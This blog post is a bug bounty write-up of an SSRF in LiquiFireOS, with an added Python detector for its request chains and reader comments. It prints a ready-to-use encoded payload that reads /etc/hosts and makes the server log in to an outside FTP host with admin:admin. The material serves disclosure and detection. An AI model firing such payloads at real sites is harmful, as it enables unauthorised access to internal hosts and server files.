Saturday, 28 December 2019

Testing SSRF in LiquiFireOS

During one bug bounty I noticed that the target web app was returning some 'interesting errors' in its responses. ;) As that is always a nice hint to see during pentests/CTFs, I decided to dig a little deeper. Below you will find the details of the SSRF I found in LiquiFireOS. Here we go...

Today we'll start here:


This solution was 'something new' for me. An example response I found online during the bug bounty:
 
 
I decided to use Burp Suite and try a few of the scenarios described in one of the posts available on the blog:


A few more cases (and a sample response):



So it looks like we're talking about version 4.8.0 :) Cool, next:

As you can see (example requests from Intruder), one part of the link stands out: the url parameter.
I decided to try some other 'url' values :) Results below:


That looks interesting ;> So what is the problem? Maybe the port? Maybe the hostname? I'll try changing both of them:



That's nice :) Is there any other parameter available for this kind of modification?


To verify it I decided to read a very nice book for Christmas, called the manual: ;)


You can find a few more cool cases and examples there.

As I saw in one of the error messages, only four URL schemes are accepted: http://, ftp://, file:// and cms://. I decided to try http and ftp:

Nice response. ;)

I decided to check whether the target app could do something else for me, for example log in to some (internal? ;)) FTP server. Because I do not have one (inside the 'target/bug bounty company' ;)), I used some nice-for-cats FTP server I found online. Let's try to log in with admin:admin credentials:


Looks promising ;)

If you look at the main page (of the target), you should see something like this:


Sample payload to use in your URL:
"%3Fset%3Dsource[/etc/hosts]%2Corigin[/etc/]%2Ccategory[2]%2Ctype[DESCRIPTIVESTILLLIFE]%2Chmver[3]%26call%3Durl[ftp:%2f%2fadmin:admin@xxxxxxxxx.pl/]"

Maybe you'll find it useful.
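The payload above is a LiquiFire-style chain: a `set=` list of `name[value]` items and a `call=url[...]` item, percent-encoded so that `?`, `=`, `&` and `,` survive inside the outer URL, with the scheme of the inner URL limited (per the error message mentioned earlier) to http://, ftp://, file:// and cms://. The script below is an added example, not code from the post or from LiquidPixels: it rebuilds that chain from its parts, decodes it back, and classifies what the `url[...]` target would make the server do, which is the check I would bolt onto a proxy log or WAF rule. The allow-list of hosts, the label names and the sample request targets are my own constructed assumptions, not observed data.

```python
import re
from urllib.parse import quote, unquote, urlsplit

# Schemes the application's own error message lists as accepted (from the post).
ACCEPTED_SCHEMES = ("http", "ftp", "file", "cms")

# Keep brackets and the inner URL's ':' '@' '/' readable; '?', '=', '&', ','
# get percent-encoded so the chain survives inside the outer URL.
# (The post's hand-made payload additionally encodes the inner slashes as %2f.)
_SAFE = "[]/:@"

_ITEM_RE = re.compile(r"(\w+)\[([^\]]*)\]")          # name[value]
_CHAIN_RE = re.compile(r"(?:\?|%3F)set(?:=|%3D)", re.IGNORECASE)

# The payload exactly as shown in the post.
PAGE_PAYLOAD = ("%3Fset%3Dsource[/etc/hosts]%2Corigin[/etc/]%2Ccategory[2]"
                "%2Ctype[DESCRIPTIVESTILLLIFE]%2Chmver[3]"
                "%26call%3Durl[ftp:%2f%2fadmin:admin@xxxxxxxxx.pl/]")

# Constructed request targets (assumption: not real traffic) for scan_requests().
SAMPLE_REQUESTS = [
    "/images/product.jpg?set=source[a.jpg]&call=url[http://images.example/a.jpg]",
    "/images/product.jpg" + PAGE_PAYLOAD,
    "/images/product.jpg%3Fset%3Dsource[a.jpg]%26call%3Durl[http://127.0.0.1:8080/]",
    "/images/product.jpg?set=source[a.jpg]&call=url[file:///etc/hosts]",
    "/images/product.jpg?set=source[a.jpg]&call=url[gopher://images.example/]",
    "/static/logo.png",
]


def build_chain(set_items, call_items):
    """Render `?set=k[v],...&call=k[v],...` and percent-encode it for use inside another URL."""
    def render(items):
        return ",".join(f"{k}[{v}]" for k, v in items.items())
    raw = f"?set={render(set_items)}&call={render(call_items)}"
    return quote(raw, safe=_SAFE)


def parse_chain(encoded):
    """Inverse of build_chain: decode and return {'set': {...}, 'call': {...}}."""
    raw = unquote(encoded).lstrip("?")
    chain = {}
    for part in raw.split("&"):
        name, _, value = part.partition("=")
        chain[name] = dict(_ITEM_RE.findall(value))
    return chain


def classify(encoded, allowed_hosts):
    """Label a chain by what its url[...] target would make the server fetch."""
    target = parse_chain(encoded).get("call", {}).get("url")
    if target is None:
        return "no-url-call"
    u = urlsplit(target)
    scheme = u.scheme.lower()
    if scheme not in ACCEPTED_SCHEMES:
        return "rejected-scheme"        # the app itself refuses these, per its error message
    if scheme == "file":
        return "file-scheme"            # accepted by the app; not exercised in the post
    if u.username is not None:
        return "credentialed-fetch"     # e.g. ftp://admin:admin@host/ as in the post
    if u.hostname not in allowed_hosts:
        return "unlisted-host"          # server fetches an attacker-chosen host: the SSRF
    return "listed-host"


def scan_requests(request_targets, allowed_hosts):
    """Pick chains out of raw request targets and classify each one."""
    findings = []
    for rt in request_targets:
        m = _CHAIN_RE.search(rt)
        if m:
            findings.append((rt, classify(rt[m.start():], allowed_hosts)))
    return findings


if __name__ == "__main__":
    for rt, label in scan_requests(SAMPLE_REQUESTS, {"images.example"}):
        print(f"{label:18} {rt}")
```

`build_chain` with the post's `set` items and `url[ftp://admin:admin@xxxxxxxxx.pl/]` decodes to the same chain as `PAGE_PAYLOAD`; the only difference in the encoded form is the inner slashes. Anything the scanner labels other than `listed-host` or `rejected-scheme` is worth a look, and `credentialed-fetch` is the case the post demonstrates.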

See you next time!

Cheers




7 comments:

  1. hi,
    do you still have the user manual of liquidfire os? i can't find it anywhere. need it for a security bug.

  2. hi, unfortunately - no. but I believe you'll find some hints and answers at their webpage: knowledge,liquidpixels,com. hope that helps. :)

    thanks for watching ;)

    cheers

  3. Hey, I escalated this to critical. I only reported it to one program; I could not find a lot of websites running this.

  4. I found many webpages that have this error, but I need more payloads.

    Replies
    1. Cool. I believe you already informed the author(s) ;) so now probably it's a good time to talk directly with the vendor about the exploitation scenarios and your other ideas.

      I can help only with legal project/research.

      Thanks for watching.

      Cheers

  5. Any resources regarding escalation to Critical ?

    Replies
    1. Hi,

      thanks for watching. I appreciate it. ;)

      Answering: I did not dig deeper for this bug.
      Probably a good idea is to check and/or ask the vendor directly: https;// iquidpixels, com

      Cheers
